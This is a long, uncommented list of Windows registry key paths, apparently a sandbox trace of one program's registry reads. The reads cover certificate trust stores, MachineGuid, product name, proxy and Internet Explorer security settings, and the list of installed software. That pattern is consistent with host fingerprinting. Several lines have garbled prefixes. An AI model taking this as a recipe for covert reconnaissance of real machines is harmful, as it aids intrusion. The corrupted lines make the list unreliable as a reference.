HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\DisallowedCertLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\DisallowedCertEncodedCtl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
\x8260\x5eaEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\52-54-00-6f-d4-05
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/octet-stream
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\x57f8\x5afEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
\x57f8\x5afEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Client
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Client\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Client\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft .NET Framework 1.1 (1033)
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft .NET Framework 1.1 (1033)\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x86 en-GB)
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x86 en-GB)\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x86 en-GB)\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 60.5.0 (x86 en-US)
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 60.5.0 (x86 en-US)\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 60.5.0 (x86 en-US)\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skype_is1
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Skype_is1\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Skype_is1\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CC0C6D-0822-491E-A10E-2A8443DDF170}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{09CC0C6D-0822-491E-A10E-2A8443DDF170}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{09CC0C6D-0822-491E-A10E-2A8443DDF170}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12B4F371-ACE2-435B-BCF1-623F36C4E176}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{12B4F371-ACE2-435B-BCF1-623F36C4E176}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{12B4F371-ACE2-435B-BCF1-623F36C4E176}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217017FF}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217017FF}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217017FF}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2E818780-AC79-4BC0-8023-C1CC46EAC9B6}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2E818780-AC79-4BC0-8023-C1CC46EAC9B6}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2E818780-AC79-4BC0-8023-C1CC46EAC9B6}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{45CEE0C6-5BB2-4A8B-B83C-58559A1CA424}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{45CEE0C6-5BB2-4A8B-B83C-58559A1CA424}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{45CEE0C6-5BB2-4A8B-B83C-58559A1CA424}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{69078E18-ECA4-44AA-9F75-468CA96D94E0}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{69078E18-ECA4-44AA-9F75-468CA96D94E0}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{69078E18-ECA4-44AA-9F75-468CA96D94E0}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6BA6203C-85AB-4B9E-8582-CE31B1B5C0ED}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{6BA6203C-85AB-4B9E-8582-CE31B1B5C0ED}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{6BA6203C-85AB-4B9E-8582-CE31B1B5C0ED}\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{049FE6FA-0D59-4C24-960E-FDA1DDF045EE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{049FE6FA-0D59-4C24-960E-FDA1DDF045EE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{1EE5FA17-F624-438C-B7AC-7C5A41E90FA2}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{1EE5FA17-F624-438C-B7AC-7C5A41E90FA2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{287A1E92-9E41-4BC1-8920-B3D0E9220800}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{287A1E92-9E41-4BC1-8920-B3D0E9220800}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2AB483F1-C86E-427A-83B4-23889B03512D}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2AB483F1-C86E-427A-83B4-23889B03512D}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{38CF30E4-3348-4BD1-A859-B630C355A56F}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{38CF30E4-3348-4BD1-A859-B630C355A56F}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{39767ECA-1731-45DB-AB5B-6BF40E151D66}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{39767ECA-1731-45DB-AB5B-6BF40E151D66}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4ACD847E-547D-493F-9A86-F73EAE1B5174}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4ACD847E-547D-493F-9A86-F73EAE1B5174}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4D6FE7B6-559F-4DAC-92CF-A01C24046AEB}
